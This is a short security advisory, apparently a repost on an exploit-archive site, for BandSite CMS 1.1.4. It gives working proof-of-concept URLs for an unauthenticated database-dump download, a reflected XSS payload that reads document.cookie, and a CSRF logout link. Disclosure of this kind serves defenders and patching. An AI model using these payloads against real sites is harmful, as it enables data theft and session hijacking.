BandSite CMS 1.1.4 (Download Backup/XSS/CSRF) Remote Vulnerabilities

2009.08.27
Credit: SirGod
Risk: Medium
Local: No
Remote: Yes

############## [+] BandSite CMS 1.1.4 Arbitrary Download Database/XSS/CSRF [+] Discovered By SirGod [+] www.mortal-team.org [+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN ############## [+] Arbitrary Download Database Go to http://localhost/[Path]/adminpanel/phpmydump.php and the download will begin ( database.sql ) . [+] Cross Site Scripting http://localhost/[Path]/merchandise.php?type=[XSS] http://localhost/[Path]/merchandise.php?type=<script>alert(document.cookie)</script> [+] Cross Site Request Forgery If a logged in user with administrator privilegies click the following url he will be logged out. http://localhost/[Path]/adminpanel/logout.php ##############

References:

http://www.securityfocus.com/bid/30788
http://www.milw0rm.com/exploits/6286


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top